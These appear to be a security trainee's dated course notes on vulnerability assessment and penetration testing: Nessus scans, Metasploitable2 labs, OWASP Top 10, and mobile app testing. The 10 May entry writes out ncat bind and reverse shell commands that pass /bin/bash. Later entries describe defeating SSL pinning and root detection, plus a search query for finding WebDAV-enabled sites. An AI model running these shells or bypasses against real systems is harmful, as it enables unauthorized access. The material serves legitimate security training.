VAPT Meeting Notes
VAPT Meeting Notes
VAPT Meeting Notes
05 May 2021
VA/PT 10:00 AM
TOPICS
Vulnerability Assessment
Nessus Steps
1. Start Nessus
2. Go to https:localhost:8834.
3. Complete registration on first install. Else login.
4. Select Advanced Scan
5. Name the scan. Specify target - 192.168.29.121
6. Go to Plugins -> Disable “Denial of Service” plugin.
7. Go to Settings -> Discovery -> Host Discovery -> Ping the remote host -
ON.
8. Save and Run the Scan.
NOTES
● Linux command “apropos sample” - Gives list of all commands related to
sample
HOME TASKS
1. Walkthrough of VulnHub machine Metasploitable2 (192.168.1.74).
2. Go through the vulnerability list exported from Nessus for 192.168.1.74.
3. Learn linux basics and commands.
06 May 2021
VA/PT !0:00 AM - 12:30 PM, 3:30 PM - 6:00 PM
TOPICS
Penetration Testing
Report to Client
HOME TASKS
1. Enumerate Metasploitable2 and find other exploits.
07 May 2021
VA/PT !0:00 AM
TOPICS
NOTES
● Auxiliary and Exploit - Auxiliary usually covers fingerprinting and has
scanning capabilities. It doesn't not require a payload. Exploits use
payloads. Any module that is not an Exploit is an Auxiliary.
● Rpcclient: to be discussed
REFERENCE LINKS
https://www.offensive-security.com/metasploit-unleashed/scanner-telnet-auxilia
ry-modules/
https://resources.infosecinstitute.com/topic/exploiting-nfs-share/
https://salt.security/blog/api6-2019-mass-assignment
HOME TASKS
1. Practise VAPT on Metasploitable 2 remaining ports after VNC.
2. Fill VAPT Report.
3. OWASP Top 10.
4. Research rpcclient.
10 May 2021
VA/PT 10:00 AM
TOPICS
VAPT
NOTES
● CeWL (Custom Word List Generator) - Tool that relies on web crawlers for
a specific url and tries to generate a word list for usernames and
passwords. This wordlist can be then used with other brute force
attacks.
BIND Shell 💀
(root kali)-[/home/kali]
# ncat -nvlp 4444 -e /bin/bash
root@metasploitable#
nc 192.168.1.10 4444
Ncat: Version 7.91 ( https://nmap.org/ncat [will get Bob’s shell
) here]
Ncat: Listening on :::4444
Ncat: Listening on 0.0.0.0:4444
Ncat: Connection from 192.168.1.20.
Ncat: Connection from 192.168.1.20:40294.
[Listener]
Reverse
Shell
💀
(root kali)-[/home/kali]
# ncat -nv 192.168.29.121 4444 -e
root@metasploitable#
nc -nvlp 4444 [Listener]
/bin/bash [Will get Bob’s shell
1 ⨯ here]
Ncat: Version 7.91 (https://nmap.org/ncat)
Ncat: Connected to 192.168.1.20:4444.
● Linux Commands
- /bin: basic programs (ls, cd, cat, etc.)
- /sbin: system programs (fdisk, mkfs, sysctl, etc)
- usr/bin: applications (apt, ncat, nmap, etc.)
- usr/sbin: applications for system admin.
- usr/share: application support and data files
- /tmp: temporary files (typically deleted on boot)
- /etc: configuration files
- man -k passwd: Manual command
- Apropos: used when you don’t remember a command
- Pwd: present working directory
- Cd~ : [~ is Tilde. Used to go to Home directory]
- Which: used to find program path
- Locate: locates all results of the executable. Need to use
“updatedb” before to update the database.
- Find: searches and lists files/directories based on argument
- Systemctl: controls the systemd system and service
- List-unit-files: lists the services
- History: shows history of used commands. To select: !2045
- Reverse-i-search: Press Ctrl+R and keyword to get related commands
from history.
- Redirection: echo ls-la > test.txt [puts the text “ls-la” in txt
file].
- ls -al > test.txt : [Stores output of command ls -al into
test.txt]
- Wc: Word Count. Counts the number of lines, words, characters,
bytes, etc.
- Sed: Stream Editor for insertion, deletion, find and replace.
Refer link below.
- Cut: To cut sections from file using range or delimiters and
display the output. Refer link below.
- Awk: manipulating data and generating reports. Refer link.
- Curl:
● Processes Commands
- Ps: Lists current user’s background processes with ID.
- Kill <process ID>: To kill Process.
- Pkill: Kill specific processes.
- Run process in background: Put & at the end of command. OR press
Ctrl+Z while the process is running.
● POP vs IMAP: POP downloads email from server on single device. Does Not
store on Server. Internet access is needed only for receiving and
sending emails. IMAP is used to access email from multiple devices.
Syncs folder with server and other devices.
● Rpcclient
● OWASP top 10
REFERENCE LINKS
https://www.ssh.com/academy/ssh/public-key-authentication
https://upcloud.com/community/tutorials/use-ssh-keys-authentication/
https://medium.com/@PenTest_duck/bind-vs-reverse-vs-encrypted-shells-what-shou
ld-you-use-6ead1d947aa9
https://www.geeksforgeeks.org/sed-command-in-linux-unix-with-examples/
https://www.geeksforgeeks.org/cut-command-linux-examples/
https://www.geeksforgeeks.org/awk-command-unixlinux-examples/
https://www.first.org/cvss/calculator/3.1
https://www.hackingarticles.in/active-directory-enumeration-rpcclient/
https://www.thegeekstuff.com/2010/09/linux-file-system-structure/
HOME TASKS
1. Use Vi command to search words in a text file.
2. Bash Script to find all subdomains of microsoft.com
11 May 2021
VA/PT 10:00 AM
TOPICS
Types of Injection
1. SQL
I. In-Band
a. Error-based
b. Union-based
II. Inferential-Band
a. Boolean-based
b. Time-based
III. Out-of-Band
2. TLS Handshake
NOTES
HOME TASKS
1. Continue VAPT for Metasploitable 2 from Nessus and Nmap.
2. API Top 10
3. Mobile Top 10
4. OWASP Top 10
12 May 2021
VA/PT 10:00 AM
TOPICS
Types of Injection
c. Boolean-based
d. Time-based
III. Out-of-Band
1. Parameterized Queries
2. Stored Procedures
3. Input Validation
Burpsuite
NOTES
REFERENCE LINKS
https://www.ssh.com/academy/ssh/public-key-authentication
13 May 2021
VA/PT 10:00 AM
TOPICS
OWASP TOP 10
HOME TASKS
REFERENCE LINKS
https://portswigger.net/web-security/cross-site-scripting/dom-based
https://medium.com/@shatabda/security-xpath-injection-what-how-3162a0d4033b
17 May 2021
Web App VA/PT 10:00 AM
TOPICS
OWASP TOP 10
1. XSS:
a. DOM-based XSS - vulnerabilities usually arise when JavaScript takes data
from an attacker-controllable source, such as the URL, and passes it to
a sink that supports dynamic code execution.
b. Reflected XSS - arises when an application receives data in an HTTP
request and includes that data within the immediate response in an
unsafe way.
c. Stored XSS - arises when an application receives data from an untrusted
source and includes that data within its later HTTP responses in an
unsafe way.
2. XPath Injection:
The data stored in XML can be queried via XPath which is similar to SQL
conceptually. XPath injection is a type of attack where a malicious
input can lead to unauthorised access or exposure of sensitive
information such as the structure and content of an XML document. It
occurs when the user's input is used in the construction of the query
string.
3. LDAP Injection:
4. Host Header Injection:
5. Broken Authentication:
6. Sensitive Data Exposure:
7. XML External Entity (XXE):
8. Insecure Deserialization: (Tool - Ysoserial)
9. Insufficient Logging & Monitoring
NETSPARKER
NOTES
● Type of Auth: Oauth, Basic, API, JWT.
● Tool for Web App VA - NetSparker, Acunetix.
● NTLM/Kerberos
HOME TASKS
1. Session Fixation & Session Hijacking
2. OWASP Top 10 go through.
3. Acunetix install and run scan.
REFERENCE LINKS
● https://portswigger.net/web-security/cross-site-scripting/dom-based
● https://medium.com/@shatabda/security-xpath-injection-what-how-3162a0d4033b
● https://jwt.io/introduction
18 May 2021
Web App VA/PT 10:20 AM
TOPICS
1. Session Hijacking/Fixation
2. Owasp top 10 Checklist
a. Robots.txt
b. WebDav: If webdav is enabled, then we can use the command “Davtest
--url http:10.0.0.1” to test what type of file uploading works.
Then use curl to upload files. Search inurl: *./webdav to find a
list of websites where webdav is enabled.
3. HTTP HEAD Allow
Check which methods are allowed: By examining the HTTP header and
checking the “Allow:” section.
HOME TASKS
1. How does the Access Control Bypass work using the Http Head method only?
2. OWASPv4 Checklist for 122.170.5.106:33441
REFERENCE LINKS
● https://owasp.org/www-project-web-security-testing-guide/v42/
19 May 2021
Web App VA/PT 10:20 AM
TOPICS
1. Registration
- User enumeration
- Stored XSS (username)
- Unrestricted file upload
- Reflected XSS (username)
2. User enumeration
3. SQL error
4. SQL injection
5. Improper error handling
6. Add Book
- XSS
- Unrestricted file upload
- SQL injection
7.
HOME TASKS
1. Continue Owasp top 10 v4 checklist.
2. Continue PT of Web App.
REFERENCE LINKS
20 May 2021
Web App VA/PT 10:20 AM
TOPICS
HOME TASKS
1. Continue VA/PT and upload CherryTree report.
REFERENCE LINKS
21 May 2021
Web App PT & Project Management 10:00 AM
TOPICS
OWASP TOP 10
Project Management
SecOps department:
- Has 3 teams (purple, blue, black) and the 4th is the Red team.
- Has Team Lead and Team Members
New Projects:
Documentation:
Scans:
Starting steps:
Postman
HOME TASKS
1. SSRF
2. SQLMap
REFERENCE LINKS
● https://apisecurity.io/encyclopedia/content/owasp/api1-broken-object-level-aut
horization
● https://github.com/inonshk/31-days-of-API-Security-Tips
● https://mobisec.reyammer.io/slides
● https://application.security/free/owasp-top-10
● https://developers.facebook.com/docs/whatsapp/guides/postman/
24 May 2021
Web App VA/PT & Mobile 10:30 AM
TOPICS
- https://owasp.org/www-project-api-security/
- https://apisecurity.io/encyclopedia/content/owasp/owasp-api-security-top
-10.htm
NOTES
1. DB Database Tool (SQLite) to view databases. (https://sqlitebrowser.org/)
2. FRIDA - To bypass SSL Pinning
3. Android apps:
a. Xposed installer
b. RootCloak - (Hides from the apps that device is rooted)
c. SSLUnpinning 2.0 - (Unpin selected apps from SSl certificate)
4. Use Smali code to edit if the java cannot be edited. Find true/false in java
code and find the respective 0x1(true) 0x0(false) values in Smali code and
change them as required.
5. Find process log using adb (use “findstr” instead of “grep” in windows)
a. adb shell ps | grep com.c*
b. → gives process id → 3897
c. adb logcat | grep 3897
HOME TASKS
1. How to recompile an APK along with signing after making changes.
2. FRIDA
REFERENCE LINKS
● https://portswigger.net/web-security/ssrf
● https://github.com/OWASP/owasp-mstg/blob/master/Checklists/Mobile_App_Security
_Checklist-English_1.2.xlsx
● https://owasp.org/www-project-mobile-top-10/
● https://www.appsealing.com/owasp-mobile-top-10-a-comprehensive-guide-for-mobil
e-developers-to-counter-risks/
● https://androidtamer.com/learn_android_security
● https://medium.com/swlh/defeating-android-root-detection-with-smali-patching-4
6c082c27a81
24 May 2021
Mobile Testing 10:00 AM
TOPICS
1. Tools
- Genymotion (Android Emulator)
- MobSF (Automated testing for Mobile Apps)
- Android Tamer (All-in-one VM for Mobile testing)
- Android Debug Bridge (ADB) (For shell access to Android device)
- DB Database SQLite
- Android tools
● Xposed installer
● RootCloak (Hides from the apps that device is rooted)
● SSL Unpinning 2.0
2. Using GenyMotion
3. Using MobSF
HOME TASKS
1. Install discussed tools: Genymotion, MobSF
2. Study Mobile App basics on MobiSec link below.
3. Practise Testing using DIVA (Damn Insecure and Vulnerable Application)
(Available on AndroidTamer site)
REFERENCE LINKS
https://mobisec.reyammer.io/slides
https://developer.android.com/guide/components/fundamentals
25 May 2021
Mobile Testing 10:30 AM
TOPICS
1. Mobile Testing
- Static
- Dynamic
2. Using MobSF for Static and Dynamic Testing.
3. Discussion on Concepts covered from MobiSec link.
SSL Unpinning
- https://infosecwriteups.com/hail-frida-the-universal-ssl-pinning-bypass-
for-android-e9e1d733d29
HOME TASKS
1. SSL Unpinning using Frida
2. Practise Testing using DIVA (Damn Insecure and Vulnerable Application)
(Available on AndroidTamer site)
REFERENCE LINKS
https://mobisec.reyammer.io/slides
26 May 2021
Mobile Testing 10:30 AM
TOPICS
Qualys
Configuration Audit
TLS Handshake
HOME TASKS
REFERENCE LINKS
● https://www.hackingarticles.in/android-pentest-automated-analysis-using-
mobsf/
● https://www.qualys.com/training/#instructor-led
● https://www.pcisecuritystandards.org/